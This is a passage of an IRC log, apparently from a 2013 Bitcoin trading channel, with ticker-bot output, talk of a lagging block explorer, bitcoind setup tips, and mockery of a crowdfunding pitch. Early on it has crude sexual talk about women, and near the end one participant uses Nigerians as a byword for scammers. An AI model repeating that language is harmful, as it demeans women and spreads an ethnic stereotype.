20:59:22 't think that much but still . yeah. Apr 07 20:59:26 not that torbroker kid Apr 07 20:59:31 well... Apr 07 20:59:42 Mary Jo is no joke Apr 07 20:59:49 MJR__ let's try a different approach, maybe sex works better. Apr 07 20:59:53 lol Apr 07 20:59:58 there's a girl that says she looks good, but will never pose naked. Apr 07 21:00:06 you believe girls look good till proven otherwise ? Apr 07 21:00:08 ok Apr 07 21:00:31 is this ogre a stunner just because she's carefully avoiding the flash ? Apr 07 21:00:36 well...not sure the level of dumbness built into this Apr 07 21:01:02 but I can usually tell whether a girl will be gross or hot even with a raincoat on Apr 07 21:01:35 good for ya. consider starting a rating agency for yourself then. Apr 07 21:01:36 I highly doubt the girl I assumed to be 110 was actually 300 Apr 07 21:01:59 but if we are saying empiricism is key and not rationality... Apr 07 21:02:02 sure Apr 07 21:02:12 I can't trust her till I see her naked Apr 07 21:02:34 (though why I want to try, my motives, make no sense) Apr 07 21:03:32 but I see your point, my point is that she may not want her dad knowing she is showing her juicy bits to everyone Apr 07 21:03:43 then she's not old enough to be here. Apr 07 21:03:49 does that make her not hot? Apr 07 21:03:52 yes. Apr 07 21:03:55 the dad is the SEC Apr 07 21:04:01 i dun care who her dad is. Apr 07 21:04:07 lol Apr 07 21:04:08 if she cares what he thinks she's not tall enough to ride. Apr 07 21:04:37 also, not taking into consideration all the other no-no flags, that broker is targeting people who think divesting BTC into stocks is a good idea Apr 07 21:04:39 so Americans who care about legal ramifications should avoid shady areas of bitcoin, we agree Apr 07 21:04:48 yeah. Apr 07 21:04:53 not sure how to make sexual analogy for it Apr 07 21:04:58 jurov butts Apr 07 21:05:00 jurov: lol Apr 07 21:05:09 I love these discussions Apr 07 21:05:18 for moments like those Apr 07 21:06:18 im saying, is it useful: to some yes, is it possible: yes, is anonymity necessary in this case: yes Apr 07 21:06:43 have they tried to make a good faith gesture to the community: yes Apr 07 21:06:52 so, I don't judge Apr 07 21:07:04 hope they do it well Apr 07 21:07:12 and turn out to be legit Apr 07 21:07:41 best of luck to them, worst of luck to Mary Jo Apr 07 21:08:14 I think they will either run away with the coins, or lose everything due to incompetence Apr 07 21:08:25 Mary jo white: chairman of SEC Apr 07 21:09:54 we'll see...I am not vouching for them. if they put up 1k bitcoins, is trust them up to 1k bitcoins Apr 07 21:10:59 one thing to notice about this idea, is that people are more scared about this than SR... Apr 07 21:10:59 just btw: http://bitbet.us/bet/314/bitcointalk-org-treasurer-to-be-scammer-tagged/?ref=1EteoRKNYbNhhmFfsKnUSWRF3JUpKCcMnc Apr 07 21:11:21 also something to be scared about Apr 07 21:12:50 whos that like Theymos or whatever? Apr 07 21:13:02 [HAVELOCK] [VTX] 2 @ 0.39 = 0.78 BTC [-] Apr 07 21:13:03 [BTCTC] [CRYPTO-TRADE] 7 @ 0.2 = 1.4 BTC [+] Apr 07 21:13:38 mod6 yes theymos is providing interest free loans Apr 07 21:14:01 [HAVELOCK] [HIM] 5 @ 1.83 = 9.15 BTC [-] Apr 07 21:15:00 [HAVELOCK] [VTX] 1 @ 0.39 BTC [-] Apr 07 21:15:28 MJR__ the risks that make ppl afraid of torbroker were thoroughly explained by mp... Apr 07 21:16:01 [HAVELOCK] [HIM] 2 @ 1.82 = 3.64 BTC [-] Apr 07 21:16:16 jurov: I agree, being scared and being scammed are two completely different things Apr 07 21:16:28 on SR at least you can assume is in mutual interest of both parties not to get busted Apr 07 21:16:30 and it ends up requiring trust regardless Apr 07 21:16:47 same in this scenario I think Apr 07 21:17:04 unlicensed broker vs insider trading or w/e Apr 07 21:17:22 jurov: hmm. ok thx. Apr 07 21:17:40 so far no treasurer has been scammer tagged right? Apr 07 21:17:54 ;;seen smickles Apr 07 21:17:54 smickles was last seen in #bitcoin-assets 3 days, 2 hours, 35 minutes, and 21 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 07 21:17:54 lol not afaik Apr 07 21:17:55 didn't know everyone on the list Apr 07 21:18:24 anyways, im against regulation that stifles growth and increases cost Apr 07 21:18:51 it's sacred that your vote is anonymous but my stock transactions can't be? Apr 07 21:19:57 was trying to figure out how to work in "or the terrorists win"... Apr 07 21:20:30 that's another discussion. Apr 07 21:20:54 lol Apr 07 21:21:06 moved to other computer, still me Apr 07 21:21:14 there Apr 07 21:24:50 asciilifeform http://trilema.com/2013/the-bitcoiners-press-manual/#comment-92639 Apr 07 21:25:00 [HAVELOCK] [VTX] 1 @ 0.38100001 BTC [-] Apr 07 21:25:54 somebody on sa was proposing the theory that theymoos is preparing to steal the forum funds Apr 07 21:26:06 and is looking for patsies to do it, hence the bizzare forum loan thing. Apr 07 21:26:09 that's how that bet was born Apr 07 21:26:56 oh, i rather put the bet on natural decay premise Apr 07 21:27:22 and past performance. no need for conspirations here Apr 07 21:29:01 [HAVELOCK] [SDICE] 1 @ 0.27700001 BTC [-] Apr 07 21:29:02 [HAVELOCK] [SDICE] 4 @ 0.277 = 1.108 BTC [-] Apr 07 21:29:09 ;;ticker Apr 07 21:29:10 BTCUSD ticker | Best bid: 160.88000, Best ask: 161.19990, Bid-ask spread: 0.31990, Last trade: 160.88000, 24 hour volume: 52201.20570405, 24 hour low: 142.10000, 24 hour high: 162.90000, 24 hour vwap: 151.86806 Apr 07 21:29:16 .277 hmm Apr 07 21:29:30 mircea_popescu: good article, but i feel like it doesn't account for the "sheepness" of americans, see: stanford experiment Apr 07 21:29:53 jurov o its yours ? Apr 07 21:30:00 just have doctors say: "paying taxes is a good way to avoid heart disease" and they'll prob do it Apr 07 21:30:01 [HAVELOCK] [VTX] 1 @ 0.385 BTC [+] Apr 07 21:30:07 lmao Apr 07 21:30:41 end of the day "proles" are proles, not because they have to be, but cuz they want to be Apr 07 21:30:57 most people want to show up, be told what to do, and then go home and watch a big flat screen Apr 07 21:31:29 its telling that for most people one of their biggest fears is speaking in public Apr 07 21:31:39 hence, one guy on stage, big crowd Apr 07 21:31:54 exactly the way they all like it Apr 07 21:32:01 [HAVELOCK] [SDICE] 4 @ 0.309 = 1.236 BTC [+] Apr 07 21:32:56 i thouight you didn't agree regulations are there to protect the litytle guy. Apr 07 21:33:03 doing nothing is what they are good at, and that's all thats required for the triumph of evil Apr 07 21:33:46 couldn't untangle the negatives...token regulations appear to protect the little guy, but the system is designed to make them serfs Apr 07 21:33:59 bread and circus's Apr 07 21:34:09 mkay. Apr 07 21:34:16 couldn't figure out plurals there either...lol Apr 07 21:34:54 my whole philosophy on rule is that the best rise to the top and out of a sense of morals treat others with some respect Apr 07 21:35:40 you would be surprised (or maybe you wouldn't) at home many btc users would voluntarily list btc gains on their taxes Apr 07 21:35:46 *how Apr 07 21:36:15 typically the long suffering middle class that doesn't yet realize its all a sham Apr 07 21:36:25 $avg Apr 07 21:36:27 ThickAsThieves: 150.20 Apr 07 21:36:49 wow we got political today huh? lets lighten up the mood huh? YAY 160 Apr 07 21:37:12 yes the bet is mine. and i commented on that innovation rant. Apr 07 21:37:36 "Women in Uganda who go out wearing mini-skirts could face jail or a heavy fine under draconian new anti-pornography laws. " Apr 07 21:37:51 apparently uganda is not literate enough to understand that the actual woman IS NOT GRAPHY Apr 07 21:38:11 hahaha Apr 07 21:40:15 ;;rate mircea_popescu 5 Owner/Operator of MPEx - Always professional and helpful! A number BTC txs between us. Apr 07 21:40:16 Rating entry successful. Your rating for user mircea_popescu has changed from 4 to 5. Apr 07 21:40:21 so much for the "correction" Apr 07 21:40:54 ;;ticker Apr 07 21:40:56 BTCUSD ticker | Best bid: 160.27000, Best ask: 161.34440, Bid-ask spread: 1.07440, Last trade: 160.26000, 24 hour volume: 52286.65160406, 24 hour low: 142.10000, 24 hour high: 162.90000, 24 hour vwap: 151.93692 Apr 07 21:43:01 [HAVELOCK] [SDICE] 2 @ 0.31 = 0.62 BTC [+] Apr 07 21:43:24 ;;tslb Apr 07 21:43:29 Time since last block: 2 hours, 7 minutes, and 28 seconds Apr 07 21:43:32 O.O Apr 07 21:43:50 no wai ?! Apr 07 21:44:05 are we forked again ? Apr 07 21:44:14 ??? Apr 07 21:44:16 what? Apr 07 21:44:27 this is why ltc Apr 07 21:44:33 [MPEX] [S.DICE] 250 @ 0.00301846 = 0.7546 BTC [-] Apr 07 21:44:49 maybe just had a diff change? Apr 07 21:45:04 doesn't look like there have been any orphaned blocks en mass yet... Apr 07 21:45:04 diff change was yesterday i thouhght Apr 07 21:45:07 ;;bc,stats Apr 07 21:45:10 Current Blocks: 230145 | Current Difficulty: 7672999.920164138 | Next Difficulty At Block: 231839 | Next Difficulty In: 1694 blocks | Next Difficulty In About: 1 week, 4 days, 12 hours, 34 minutes, and 17 seconds | Next Difficulty Estimate: 8807725.92632 | Estimated Percent Change: 14.78856 Apr 07 21:45:51 dafuq? Apr 07 21:46:21 ;;bc,nethash Apr 07 21:46:22 Error: "bc,nethash" is not a valid command. Apr 07 21:46:25 bah Apr 07 21:46:39 no orphand blocks Apr 07 21:47:13 ;;nethash Apr 07 21:47:14 60017.6664907 Apr 07 21:47:20 either it is broke or just a slow block Apr 07 21:47:50 hm Apr 07 21:47:53 bitbet says Last block: 9 minutes ago (230160) Apr 07 21:47:54 60Th on this... hopefully just the latter ChaangNoi Apr 07 21:48:02 ;;tslb Apr 07 21:48:06 Time since last block: 2 hours, 12 minutes, and 6 seconds Apr 07 21:48:07 well yeah we all hope the latter:) Apr 07 21:48:14 bitbet is a tank :o Apr 07 21:48:17 you're on 230160 kakobrekla?! Apr 07 21:48:42 last block i see is 230145 Apr 07 21:48:45 230160 here Apr 07 21:48:53 oh im looking at blockchain.info Apr 07 21:48:56 ;;bc,blocks Apr 07 21:48:57 230160 Apr 07 21:49:00 okay the bot and blockchain is off Apr 07 21:49:02 ok. hmm Apr 07 21:49:05 ya seems gribble tiomer is off Apr 07 21:49:10 btc seems fine Apr 07 21:49:13 oh no fork :(( Apr 07 21:49:25 blockchain.info is off too Apr 07 21:49:29 no fork Apr 07 21:49:37 but id like to know what is up Apr 07 21:49:39 stuff makes me go: O.O Apr 07 21:49:51 yeah, i was wtf for a sec Apr 07 21:50:03 ok thx guise Apr 07 21:52:49 close to ath as well Apr 07 21:52:53 ;;ticker Apr 07 21:52:54 BTCUSD ticker | Best bid: 159.99453, Best ask: 160.00000, Bid-ask spread: 0.00547, Last trade: 160.00000, 24 hour volume: 53042.57071672, 24 hour low: 142.10000, 24 hour high: 162.90000, 24 hour vwap: 152.09510 Apr 07 21:53:00 well we were lol Apr 07 21:53:45 no this bot is fucked we are hogher lol Apr 07 21:53:57 ;;ticker Apr 07 21:53:58 BTCUSD ticker | Best bid: 159.76669, Best ask: 159.99453, Bid-ask spread: 0.22784, Last trade: 159.99453, 24 hour volume: 53050.24722819, 24 hour low: 142.10000, 24 hour high: 162.90000, 24 hour vwap: 152.09625 Apr 07 21:54:01 lol Apr 07 21:54:07 we are over 161 Apr 07 21:56:07 230160... id like to know why this bot and blockchaininfo is off Apr 07 21:56:51 and why after 10 mins my btc client still says last block was 51 secs ago Apr 07 21:57:20 nvm Apr 07 21:57:37 we hit a new block on my client and it just happend to see it at 51 seconds again Apr 07 21:57:51 odds on that... Apr 07 21:57:59 i have 230161 Apr 07 21:58:04 yeah me too Apr 07 21:58:13 yea so does: http://blockexplorer.com/ Apr 07 21:58:18 good Apr 07 21:58:33 blockchaininfo is broken Apr 07 21:58:37 [BTCTC] [ASICMINER-PT] 1 @ 0.777 BTC [+] Apr 07 21:58:39 maybe blockchain.info is just horked Apr 07 21:58:39 not a huge deal Apr 07 21:58:42 yeah Apr 07 21:58:54 it seems to be horked hard Apr 07 21:59:14 needs a bitcoind reset. Apr 07 21:59:47 lol or it's still writing a core file Apr 07 21:59:49 i have a tx that only shows 2 confs on blockchain.info, yet has cleared into the destination (mtgox) already Apr 07 22:00:13 so blockchain.info is incorrect Apr 07 22:00:45 shit, i have to run to reddit and post that bitcoin is hacked Apr 07 22:00:57 ;0 Apr 07 22:01:02 haha Apr 07 22:01:08 lol Apr 07 22:01:09 [BTCTC] [CRYPTO-TRADE] 23 @ 0.2 = 4.6 BTC [+] Apr 07 22:01:34 ThickAsThieves: i've got one going into blockchain.info too -- so we'll see what happens. Apr 07 22:01:37 no confs yet Apr 07 22:01:38 [BTCTC] [ASICMINER-PT] 1 @ 0.7775 BTC [+] Apr 07 22:02:03 was only sent a few mins ago though Apr 07 22:02:20 [BTCTC] [ASICMINER-PT] 1 @ 0.7786 BTC [+] Apr 07 22:02:24 id not send to blockchain.info until they get un horked Apr 07 22:02:37 me either/ Apr 07 22:02:51 haha, right. if i would have checked first, i'd have done a diff addr. Apr 07 22:02:58 *DOH* Apr 07 22:03:02 :) Apr 07 22:03:20 i need to run my own bitcoind's again... Apr 07 22:03:23 whydo people use online clients anyway? Apr 07 22:04:01 [HAVELOCK] [VTX] 3 @ 0.385 = 1.155 BTC [+] Apr 07 22:04:03 yeah, i have bitcoin-qt running on 3 computers Apr 07 22:04:22 just a good temp spot to do a tx to, at least thats what I use it for. my bitcoind is so far behind it grinds my hd to catch it up Apr 07 22:04:22 and takes days to catch it up Apr 07 22:04:28 i need to get a farm of bitcoinds Apr 07 22:04:58 ec2 Apr 07 22:05:10 yeah, i was curoius Apr 07 22:05:18 my next project is that Apr 07 22:05:23 how can you transfer an up to date version of bitcoin to an ec2 instance Apr 07 22:05:25 yeah, maybe i should just get a few instances up there Apr 07 22:05:39 i have one instance, i just ratchet up processing power if i need it Apr 07 22:05:43 [BTCTC] [BITVPS] 1 @ 0.00249 BTC [+] Apr 07 22:05:44 one micro is free, any more is not Apr 07 22:06:11 yep, so i leave it as t1.micro till i need to install something, boost it to m1.medium, then lower it down again Apr 07 22:06:32 micro will install anything Apr 07 22:06:41 no need to boost Apr 07 22:06:48 if you have a ton of time to wait Apr 07 22:07:01 it only goes between 1/2 an ecu and 2 ecu in short bursts Apr 07 22:07:03 [BTCTC] [BITVPS] 3 @ 0.0025 = 0.0075 BTC [+] Apr 07 22:07:24 so if you burst too long, you are running a hamster in a wheel... Apr 07 22:07:28 i know. it's been enough so far. bitcoind may crash it tho.... Apr 07 22:07:48 i wish they accepted btc @ aws Apr 07 22:07:49 well, once it is up and running, i think it'll run on a micro Apr 07 22:08:31 dude...i hate to admit it, but the US military is kinda cool... Apr 07 22:08:52 B2 bombers flew from missouri to korea to drop dummy bombs 50 miles from the border then flew home Apr 07 22:08:57 ?? their toys are. Apr 07 22:09:08 lol Apr 07 22:09:11 shit link? Apr 07 22:09:15 back in time for lunch Apr 07 22:09:49 mjr___ the problem with this entire exercise is Apr 07 22:09:59 that it cost more than what koreea is worth, lock stock and barrel Apr 07 22:10:20 lol true Apr 07 22:11:08 samsung is worth more than apple. Apr 07 22:11:24 http://www.reuters.com/article/2013/03/29/us-korea-north-usa-b-idUSBRE92S0IE20130329 Apr 07 22:11:41 first off...when people say "korea' they mean North Korea Apr 07 22:11:55 which is worth approx $17.12 Apr 07 22:12:41 So elite is the B-2 pilot corps that more people have been in outer space than have flown the aircraft, Apr 07 22:13:21 While the 20-year-old B-2 often flies for long durations - 44 hours is the record - Thursday's flight of approximately 37-1/2 hours was the plane's first non-stop mission to the Korean peninsula and back from Whiteman Air Force Base in Missouri, Air Force officials said. Apr 07 22:15:02 ;;goxlag Apr 07 22:15:03 MtGox lag is 2.490974 seconds. During this time, light travels 0.00499188400567 AU. You could have sent a bitcoin from Jupiter to its largest moon, Ganymede (0.007155 AU). Apr 07 22:15:32 ;;ticker Apr 07 22:15:33 BTCUSD ticker | Best bid: 158.76313, Best ask: 159.49000, Bid-ask spread: 0.72687, Last trade: 159.49000, 24 hour volume: 53490.89789959, 24 hour low: 142.10000, 24 hour high: 162.90000, 24 hour vwap: 152.19941 Apr 07 22:15:51 ;;bids 150 Apr 07 22:15:54 There are currently 6000.4848 bitcoins demanded at or over 150.0 USD, worth 920680.816735 USD in total. | Data vintage: 0.0047 seconds Apr 07 22:16:05 [BTCTC] [S.MPOE-PT] 2 @ 0.000649 = 0.0013 BTC [+] Apr 07 22:16:10 ;;asks 165 Apr 07 22:16:10 There are currently 3111.8879 bitcoins offered at or under 165.0 USD, worth 507975.519981 USD in total. | Data vintage: 16.6762 seconds Apr 07 22:20:15 https://bitcointalk.org/index.php?topic=130947.msg1765127#msg1765127 Apr 07 22:20:22 "I am still having little problems figuring out the accounting software and using it for proper reporting. Apr 07 22:20:22 In March, we sold only 57,90€ worth of firing services" Apr 07 22:20:29 eskimo's usagi moment ? Apr 07 22:22:15 popcorn time on that Apr 07 22:26:22 ;;asks 160 Apr 07 22:26:25 There are currently 88.641651 bitcoins offered at or under 160.0 USD, worth 14181.1047695 USD in total. | Data vintage: 0.0012 seconds Apr 07 22:26:29 ;;ticker Apr 07 22:26:31 BTCUSD ticker | Best bid: 159.31001, Best ask: 160.00000, Bid-ask spread: 0.68999, Last trade: 160.00000, 24 hour volume: 53486.82477840, 24 hour low: 142.10000, 24 hour high: 162.90000, 24 hour vwap: 152.24281 Apr 07 22:29:21 deadweasel, just buy some cheap mini-itx computer and run bitcoind from there. no need to surrender your walet to amazon Apr 07 22:32:42 [BTCTC] [RSM] 39 @ 0.0025 = 0.0975 BTC [-] Apr 07 22:34:02 [MPEX] [S.MPOE] 8100 @ 0.00065893 = 5.3373 BTC [-] Apr 07 22:34:12 [MPEX] [S.MPOE] 34252 @ 0.00065551 = 22.4525 BTC [-] Apr 07 22:35:03 https://bitcointalk.org/index.php?topic=168992.msg1762685#msg1762685 Apr 07 22:35:24 If you want a laugh Apr 07 22:38:41 already had that one lol Apr 07 22:41:39 no, i would not put my keys on ec2 lol.. but thanks for double checking.. :D Apr 07 22:44:01 [HAVELOCK] [VTX] 16 @ 0.4099999 = 6.56 BTC [+] Apr 07 22:47:01 what version are you guys liking at the moment? i've got .7, but its a ways behind yet. Apr 07 22:47:02 what's the deal with .8x? Apr 07 22:47:16 anyone using it? or are dev's still battling it out? Apr 07 22:51:59 blockchain.info es muerte Apr 07 22:52:26 mod6: duo but also curious... my instinct is to run .7 with manual patch.. Apr 07 22:53:11 deadweasel: ahh. i suppose that's a good way to go atm. Apr 07 22:54:21 i fear .81 Apr 07 22:55:00 because i can't get into #bitcoin-security and see if .8 is borked worse than it seems... Apr 07 22:55:09 ahh, ok. i heard there was a fierce debate on that in -dev Apr 07 22:55:14 mod6, I'm happy with 0.8.1. its' much easied on hdd Apr 07 22:55:43 jurov: ahh ok that sounds nice Apr 07 22:55:57 they level db now? Apr 07 22:56:01 *use Apr 07 22:56:05 yes Apr 07 22:56:15 i think what i remember hearing about it is that 0.8.1 breaks the upgrade process... or it was more problematic then usual. Apr 07 22:56:26 whats the easiest way to upgrade and do you have to redownload the whole blockchain? Apr 07 22:56:43 jeeze i really need to quit other shit an just do this full time, hard to keep up Apr 07 22:56:57 since i run two instances anyway, it was easiest to have 0.8.1 sync from 0.7 Apr 07 22:57:10 and it took only one hour over LAN Apr 07 22:57:19 ahh ok Apr 07 22:57:24 ah ok nice, can you run them both on the same machine? Apr 07 22:57:26 nice! Apr 07 22:57:55 yes, under two linux users, if you configure the second to listen on another port Apr 07 22:58:02 and connect to primary Apr 07 22:58:43 hmmm windows atm, due to some software compatiblitity issues Apr 07 22:59:06 does it come in handy when sending txns? can you confirm your own or point it at a reliable node? Apr 07 23:00:08 when ran persistently with allowed incoming connectons in firewall Apr 07 23:00:11 still has to reindex all but seems to be doing that very quick Apr 07 23:00:18 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Apr 07 23:00:18 i enjoy quick tx propagation Apr 07 23:00:45 i heard there was a way to increase how many nodes you connect to Apr 07 23:00:45 yes it does reindex but when pointed to local node on LAN it does it very quickly Apr 07 23:00:52 someone got over 20k iirc? Apr 07 23:01:17 dunno, 100 is enough for me Apr 07 23:01:30 i usually get around 8 Apr 07 23:02:21 jeeze. im dumb. Apr 07 23:02:55 mjr___: check ur router/firewall Apr 07 23:03:40 and also, i repeat if that got lost... it's better to keep it running all the time(hence my mini itx box suggestion) Apr 07 23:03:59 or old notebook or so Apr 07 23:05:17 [BTCTC] [ASICMINER-PT] 1 @ 0.7826 BTC [+] Apr 07 23:07:26 [BTCTC] [PAJKA.BOND] 2 @ 0.1 = 0.2 BTC [-] Apr 07 23:07:57 [BTCTC] [ASICMINER-PT] 1 @ 0.77 BTC [-] Apr 07 23:07:58 the reindexing is almost done Apr 07 23:08:01 very fast Apr 07 23:08:27 but still only 8 connections Apr 07 23:08:34 its using upnp i think Apr 07 23:12:57 mircea_popescu: http://www.reddit.com/r/BitcoinMillionaires Apr 07 23:13:31 can't wait to move my ec2 instance up to a high i/o model Apr 07 23:14:50 you have these 8 connections on ec2? Apr 07 23:15:28 no, on my home computer Apr 07 23:15:35 jurov lol cool. Apr 07 23:15:46 that bitcoin billionz scammer ? Apr 07 23:16:00 but i can't do much with the POS router i get from time warner Apr 07 23:16:01 the fact that i got 8 means i should be able to get more though i think Apr 07 23:16:12 definitely Apr 07 23:16:42 the EC2 is for the exchange software :) Apr 07 23:17:21 speaking of which, i may need some beta testing done... Apr 07 23:17:41 as soon as its up and running Apr 07 23:17:41 on testnet Apr 07 23:19:26 [MPEX] [S.MPOE] 22548 @ 0.00065551 = 14.7804 BTC [-] Apr 07 23:19:28 [MPEX] [S.MPOE] 11300 @ 0.00064979 = 7.3426 BTC [-] Apr 07 23:19:39 hoping to bring up fix connections and gateway today...hoping Apr 07 23:25:09 8 connections is teh default outbound amount Apr 07 23:25:17 you need to open port inbound for more Apr 07 23:26:42 ;;ticker Apr 07 23:26:43 BTCUSD ticker | Best bid: 159.00000, Best ask: 159.60000, Bid-ask spread: 0.60000, Last trade: 159.60000, 24 hour volume: 54492.68134914, 24 hour low: 142.49000, 24 hour high: 162.90000, 24 hour vwap: 152.48566 Apr 07 23:30:00 [HAVELOCK] [VTX] 1 @ 0.40888888 BTC [-] Apr 07 23:32:36 Anyone know the Mt. Gox wait list size? And/or where people get it from? Apr 07 23:33:20 people sign up and bitch publicly about how high the number is Apr 07 23:33:51 heard it was over 14k today Apr 07 23:33:53 the rest of us watch them bitch Apr 07 23:33:55 and get the number Apr 07 23:34:13 casascius coins are expensive http://www.ebay.com/sch/i.html?_nkw=casascius Apr 07 23:34:41 copumpkin: hey there, whats new Apr 07 23:35:07 [BTCTC] [COGNITIVE] 7 @ 0.145 = 1.015 BTC [+] Apr 07 23:35:41 thx guise Apr 07 23:35:53 ok blockchain.info seems to be caught back up. thx! Apr 07 23:35:55 *whew* Apr 07 23:36:31 srsly, made some ppl crazy... Apr 07 23:36:37 :D Apr 07 23:37:22 wow. that kinda thing usually makes me raise my eyebrows, but this time i had a tx that was held up! lol Apr 07 23:37:42 and i've had like 5 cups of coffee now. so.. ZOOM Apr 07 23:37:56 :] Apr 07 23:39:33 ;;ticker Apr 07 23:39:34 BTCUSD ticker | Best bid: 161.20000, Best ask: 161.24753, Bid-ask spread: 0.04753, Last trade: 161.20000, 24 hour volume: 55005.80822607, 24 hour low: 142.49000, 24 hour high: 162.90000, 24 hour vwap: 152.56799 Apr 07 23:43:12 mod6: that's a lot of coffee.. time to switch to tea? :p Apr 07 23:44:18 heheh. Apr 07 23:45:08 lol Apr 07 23:45:19 im usually drinkin mtdew -- but sometimes switch to coffee but need tons of caffeine Apr 07 23:45:41 lawd, that stuff is caffeine kryptonite.... Apr 07 23:46:04 hows your sleep ;) Apr 07 23:46:35 has been pretty minimal for years. epecially since i've been in btc. Apr 07 23:46:44 [MPEX] [S.MPOE] 22750 @ 0.00064551 = 14.6854 BTC [-] Apr 07 23:46:48 but lately not bad actually. :} Apr 07 23:48:02 ha, i hear ya. Apr 07 23:48:24 i need to get back on the all-night-satoshi-horse again though and keep coding Apr 07 23:48:34 cause thats when i get the most stuff done i think Apr 07 23:49:09 need to do moar bitotter stuff! Apr 07 23:49:25 but i've got some help now, so that's pretty awesome Apr 07 23:51:06 nice. help is good. i need someone to type for me. :/ Apr 07 23:52:12 ;;ticker Apr 07 23:52:13 BTCUSD ticker | Best bid: 161.50000, Best ask: 162.30000, Bid-ask spread: 0.80000, Last trade: 162.00000, 24 hour volume: 55783.45629488, 24 hour low: 142.50000, 24 hour high: 162.90000, 24 hour vwap: 152.73010 Apr 07 23:52:49 deadweasel: yeah that sucks dude. :/ Apr 07 23:53:03 need like a voice to text prog or something while it heals up Apr 07 23:53:29 good idea.... Apr 07 23:54:57 *shrug* might help a bit :) Apr 07 23:55:29 it might learn my speech by the time it heals Apr 07 23:57:07 deadweasel: androids voice input seems pretty good Apr 07 23:57:26 but dunno if it has desktop version Apr 07 23:58:46 gonna try julius.. then maybe get that ref done tonight. :) Apr 07 23:58:58 cool! Apr 07 23:59:35 seems like it even works for *nix Apr 08 00:02:13 ;;ticker Apr 08 00:02:15 BTCUSD ticker | Best bid: 162.04000, Best ask: 162.70000, Bid-ask spread: 0.66000, Last trade: 162.00000, 24 hour volume: 55812.02397179, 24 hour low: 142.50000, 24 hour high: 162.90000, 24 hour vwap: 152.77611 Apr 08 00:02:31 [BTCTC] [BTC-TRADING-PT] 100 @ 0.1806 = 18.06 BTC [-] Apr 08 00:08:59 $avg Apr 08 00:09:01 ThickAsThieves: 151.60 Apr 08 00:09:11 nice. Apr 08 00:11:00 [HAVELOCK] [HIM] 3 @ 1.93 = 5.79 BTC [+] Apr 08 00:16:22 [BTCTC] [ASICMINER-PT] 1 @ 0.7827 BTC [+] Apr 08 00:17:12 >>We are not collecting any money here, this is an idea that will strictly use Bitcoins. Apr 08 00:17:18 https://bitcointalk.org/index.php?topic=169663.0 Apr 08 00:18:34 kakobrekla lmao. right. Apr 08 00:18:43 because "the people" can do anything they set their mind to. Apr 08 00:18:50 at least just as soon as they find it. Apr 08 00:19:20 what do you mean, mircea_popescu? Apr 08 00:19:29 apologies if I'm late to the party... Apr 08 00:20:05 not rly, just read the last half dozen lines Apr 08 00:20:50 who are you calling "the people"? Apr 08 00:21:05 https://bitcointalk.org/index.php?topic=169663.0 Apr 08 00:21:33 i'm reading that. are you talking about everyone in the thread? the individual proposing the thing? the followers? Apr 08 00:21:50 yeah. :) Apr 08 00:21:53 "my full name is David Tenemaza Kramaley - you can look me up in the UK companies house as a registered director. I've been featured in the BBC, Business Insider, The Times, National Geographic, Radio 4, etc... I can proof all of this to serious investors." Apr 08 00:22:01 he's a registered director that can't spell "prove" Apr 08 00:22:18 spelling, man Apr 08 00:22:34 and he needs 100 bitcoins.cant afford that he should leave Apr 08 00:23:04 Hello I am son of Prince which I can proof with 40 degree alcohol. Apr 08 00:23:08 You drink it, you see it. Apr 08 00:23:19 hm Apr 08 00:23:44 it's not a terribly bad idea, but i see what you mean about the individual. Apr 08 00:23:57 We need to raise 105 BTC. Each 1.5 BTC buys 1 share in the new business. Max 25 Shares per investor. Apr 08 00:24:03 yeah, yeah. Apr 08 00:24:03 maybe he used some of that berechovka that was floating around last year Apr 08 00:24:09 ;;calc 105 / 1.5 Apr 08 00:24:10 70 Apr 08 00:24:18 70 shares, max 25 per investor. Apr 08 00:24:27 isnt this odd ? Apr 08 00:24:45 lol good maf skills also Apr 08 00:24:57 proof his maf Apr 08 00:25:28 The opportunity Apr 08 00:25:28 I'm here to propose a take over of www.bitcoingem.com together. I was made aware that this is the first chain game and by the looks of its traffic stats its pretty well established. Apr 08 00:25:32 o for fucks sake. Apr 08 00:25:46 he wants to pay 10k for a gemponzi ?! Apr 08 00:25:54 yeah dude Apr 08 00:26:10 he could buy my used socks... Apr 08 00:26:13 i throw them out anyway. Apr 08 00:26:32 someone should ipo all these shitty ideas.oh wait we already did that ... Apr 08 00:26:40 this isn't an ipo scale thing Apr 08 00:26:43 no listen to this : "Why do I think we can triple profits? Apr 08 00:26:43 I ran a social games company on Facebook since 2008 to 2012; in the 5 years of operation I made many games. " Apr 08 00:26:54 guy codes but wants to pay 10k for something I could probably werite myself Apr 08 00:28:27 this is the kind of ad hoc business that is enabled by bitcoin Apr 08 00:28:31 limited ownership Apr 08 00:28:58 limited connectivity to sanity, more like. Apr 08 00:29:27 there is a remote possibilty the gentleman has done this thing before and sees an underutilized asset he can buy low and turn the volume up on. Apr 08 00:29:30 with a recognized brand. Apr 08 00:29:40 all he really has to do is buy ads Apr 08 00:30:15 in that case he just makes a lowball offer, buys the site and goes on his way Apr 08 00:30:16 I thought the gem thing was a freak novelty gizmo fad, I liked the bitcoin flower better :). Apr 08 00:30:35 if his lowball offer is turned down he puts one guy on the project and has the site replicated by wednesday Apr 08 00:30:52 but that's not what homeboy wants to do Apr 08 00:30:54 apparently Apr 08 00:31:04 wants. it's not a matter of wants. Apr 08 00:31:13 there's a reason I ipo already functioning sites. Apr 08 00:31:30 and that is? Apr 08 00:31:47 anyone's a theoretical entrepreneur Apr 08 00:32:10 practically, you gotta bring something to the table. if you allow this model where the homeboy wants you to pay for his acquisition Apr 08 00:32:16 all he's bringing is a little nigerian skill. Apr 08 00:33:16 so? Apr 08 00:33:33 and a willingness to do it, and possibly a track record of having done it Apr 08 00:33:49 i have a lot of trouble believing that. Apr 08 00:34:01 oh sure but let's say theoretically Apr 08 00:34:06 theoretically maybe. Apr 08 00:34:08 remote chance and all that Apr 08 00:34:15 but yeah, pretty darn remote. Apr 08 00:34:20 not the point Apr 08 00:34:38 here's the problem : suppose i'm an investment fund. i have 10k btc. Apr 08 00:34:47 i put 10btc in 1k such projects Apr 08 00:35:00 985 flounder, because they were in fact run by idiots, nigerians and uidiot nigerians. Apr 08 00:35:12 the rermainder 14 will not be able to bring me 10001 btc in total. Apr 08 00:35:46 i don't really think he's looking at an investment-caliber round Apr 08 00:35:51 10 btc. Apr 08 00:36:29 so you're saying that statistically he's likely to fail. also a thing anyone who puts money into companies should expect. Apr 08 00:36:44 no, i'm not saying that statistically he's likel;y to fail Apr 08 